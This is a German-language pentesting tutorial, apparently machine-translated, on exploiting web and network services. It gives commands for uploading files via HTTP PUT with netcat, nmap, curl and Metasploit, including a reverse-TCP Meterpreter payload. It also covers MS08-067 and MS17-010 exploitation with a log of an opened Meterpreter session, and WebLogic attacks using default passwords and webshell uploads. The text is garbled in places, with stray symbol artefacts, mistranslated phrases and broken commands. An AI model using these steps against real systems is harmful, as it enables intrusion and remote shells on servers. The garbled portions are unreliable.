Heim > Artikel > Betrieb und Instandhaltung > Beispielanalyse der Ausnutzung von Web-Schwachstellen
1. Verwendung der HTTP-PUT-Methode
PUT ist eine Methode zur Dateiverwaltung. Wenn das Betriebs- und Wartungspersonal die Standardkonfiguration des Webservers nicht geändert hat und diese Methoden weiterhin unterstützt, kann es Dateien auf den Server hochladen Dateisystem nach Belieben.
1.1. Netcat verwendet die PUT-Methode
Netcat ist ein sehr bekanntes Netzwerktool, das als „NC“ bezeichnet wird und im Penetrationstest als „Schweizer **“ bekannt ist. Es kann mehrere Funktionen wie Portüberwachung, Port-Scanning, Remote-Dateiübertragung und Remote-Shell implementieren.
Nachdem Sie die PUT-Methode zum Öffnen des Webdienstes überprüft und kennen, geben Sie den folgenden Befehl ein, um die Datei hochzuladen:
nc IP PORT
PUT /dav/hack.txt HTTP/1.1
Host: IP
Drücken Sie zweimal die Eingabetaste. Sie können sehen, dass die Datei hacked.txt erfolgreich erstellt wurde, der Statuscode 201 ist und der Speicherort der Dateierstellung das Verzeichnis /dav/ ist.
1.2, Nmap verwendet die PUT-Methode
Befehl:
nmap -p port IP -script http-put-script-args http-put.url='/dav/test.php',http-put.file ='/root/test.php'
Befehlserklärung:
-script http-put //Wählen Sie das http-put-Skript aus. Das Skript unterstützt das Hochladen von Dateien mit der http-put-Methode. T -Script-rags // Setze die Skriptparameter 1, 2
http-put.url = '/dav/test.php' // Setze Parameter 1 auf den Upload-Zieldateipfad
http-put.file = ' /root/test.php' //Parameter 2 auf den lokalen Dateipfad zum Hochladen setzen.
Auf dem Bild sehen Sie, dass der Upload über das Nmap-Skript erfolgreich war.
1.3 BurpSuite verwendet die PUT-Methode
Das Server-Antwortpaket zeigt, dass die Datei erfolgreich erstellt wurde.
1.4 CURL verwendet die PUT-Methode
Der Befehl zum Erstellen einer Datei über die PUT-Methode lautet wie folgt:
Befehl 1:curl -i -XPUT -H „Content-Type: text/plain=utf-8“ -d „ Hack abgeschlossen“ http://192.168.40.4/dav/hack.php
Befehlserklärung:
-i/--include //Protokoll-Header-Informationen bei der Ausgabe einbeziehen
-X/--request
Befehlserklärung: -d @„Dateiname“ //Aus Dateiinhalt lesen1.5 QuickPuT-Skript mit PUT-Methode
Mit QuickPut, einem Python-Befehlszeilentool, können wir die HTTP-PUT-Methode verwenden, um Dateien auf den Server hochzuladen.
Befehl hochladen:
python2 QuickPut.py F:1.php http://192.168.40.4/dav/hack1.php
Verwenden Sie das http_put-Modul zum zusätzlichen Scannen des http-Dienstes.
Optionen anzeigen // Modulparameter anzeigen. Set RHOSTS 192.168.40.4 // Ziel-IP festlegen der ZielpfadNutzlast festlegen php/meterpreter/reverse_tcp //Angriffsnutzlast festlegen
Dateinamen festlegen msf.php //Name der Upload-Datei festlegen
#🎜🎜 #
set FILEDATA file://root/test.php //Legen Sie den Datenpfad für das Hochladen lokaler Dateien fest exploit //Starten Sie den Angriff #🎜 🎜## 🎜🎜#Das Rückgabeergebnis zeigt, dass die Datei erfolgreich hochgeladen wurde.
2.SMB-Schwachstellenausnutzung
Schwachstellenerkennung
Befehl:
namp --script=/ usr/share/nmap/scripts/smb-vuln-ms08-067.nse –sTIP
namp --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIPBefehlserklärung:
--script=/usr/share/nmap/scripts/smb-vuln-ms08-067. nse // Nmapms08-067-Schwachstellen-Scan-Skript verwenden
-sT // TCP-Scan verwenden Wenn das Ausgabeergebnis lautet: smb-vuln - ms08-067:VULNERABLE:Microsoft Windows-System anfällig für Remotecodeausführung (MS08-067)Status: VULNERABLE# 🎜🎜#IDs: CVE:CVE-2008-4250
Der Serverdienst in Microsoft Windows 2000 SP4, XP SP2 und SP3, Server 2003 SP1 und SP2, Vista Gold und SP1, Server 2008 und 7 Pre – Beta ermöglicht Remote-Angreifern die Ausführung beliebigen Codes über eine manipulierte RPC-Anfrage, die den Überlauf während der Pfadkanonisierung auslöst 🎜#https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
# 🎜🎜#https://cve.mitre.org/cgi-bin/cvename.cgi ?name=CVE-2008-4250 weist darauf hin, dass die Schwachstelle ms08-067 vorhanden ist und ms17-010 vorhanden ist das gleiche wie oben.Ausnutzung von Sicherheitslücken
Verwenden Sie das MSF-SMB-Angriffsmodul, um die Sicherheitslücken ms08-067 und ms17-010 auszunutzen. #? (ms08 _067_netapi) > Exploit [*]Reverse-TCP-Handler am lokalen Überwachungs-IP-Port gestartetZiel-IP automatisch erkennen: 445[*]Ziel-IP: 445 - Fingerabdruck: Windows 2000 - Service Pack 0 - 4 - lang:Englisch[*]Ziel-IP:445- Ausgewähltes Ziel: Windows 2000 Universal
[*]Ziel-IP :445- Versuch, die Sicherheitslücke auszulösen...[*]Sendephase (957487 Bytes) an Ziel-IP[*]Meterpreter-Sitzung 2 geöffnet (IP-Port abhören). -> Zielport-Bounce)meterpreter>ms17-010 Exploit ist derselbe wie oben.3.Ausnutzung von Weblogic-Schwachstellen
Bei Penetrationstests stoßen wir häufig auf den Weblogic Server-Anwendungsserver. Nachdem wir Weblogic Server gesehen haben, denken wir an Weblogic Der Server verfügt möglicherweise über schwache Passwörter für die Backend-Verwaltung, Schwachstellen bei der JAVA-Deserialisierung, Schwachstellen beim Hochladen willkürlicher Dateien und viele andere CVE-Schwachstellen in dieser Version. Lassen Sie uns teilen, wie Sie verschiedene Schwachstellen in Weblogic ausnutzen können. Nr 🎜#weblogic/weblogic
weblogic/weblogic1
weblogic/weblogic10
weblogic/weblogic123
Wenn es vorhanden ist, können Sie sich beim Verwaltungshintergrund des Anwendungsservers anmelden und das Webshellwar-Paket hochladen.
Nach dem erfolgreichen Hochladen und Bereitstellen des Kriegspakets können Sie Malaysia besuchen. Vul Nervosität #🎜 🎜#CVE-Schwachstellen können direkt mithilfe von Skripten erkannt werden und dann anhand des Schwachstellencodes Exp-Skript-Exploits gefunden werden.
Das Weblogic-Schwachstellenerkennungsskript ist sehr leistungsstark und kann verschiedene CVEs, Verwaltungshintergrundpfade, SSRF und schwache Passwörter erkennen und unterstützt spätere Erweiterungen.
Sie können auch Java-Deserialisierungs-Schwachstellen-Ausnutzungstools verwenden, um diese direkt zu erkennen und auszunutzen. Das Schwachstellen-Tool bietet Schwachstellenerkennung, Befehlsausführung, Datei-Upload und Stapelprüfungsfunktionen. #3.3 🎜#Informationen durch Sprengen von Weblogic zurückgeben.
Rufen Sie das Anmeldekennwort, den Dienstnamen und das Verzeichnis mit zufälligen Zeichen ab, erstellen Sie den POC und laden Sie ihn hoch, um die Testdatei hochzuladen.
Übergeben Sie die folgenden Daten unter dem Pfad /bea_wls_deployment_internal/DeploymentService
Der Server gibt den Upload-Erfolg und den absoluten Pfad zurück der Datei.
Der Inhalt der hochgeladenen Datei wird nach Zugriff auf diesen Upload-Dateipfad angezeigt
http://IP/bea_wls_deployment_internal /shell.jsp# 🎜🎜#
Das obige ist der detaillierte Inhalt vonBeispielanalyse der Ausnutzung von Web-Schwachstellen. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!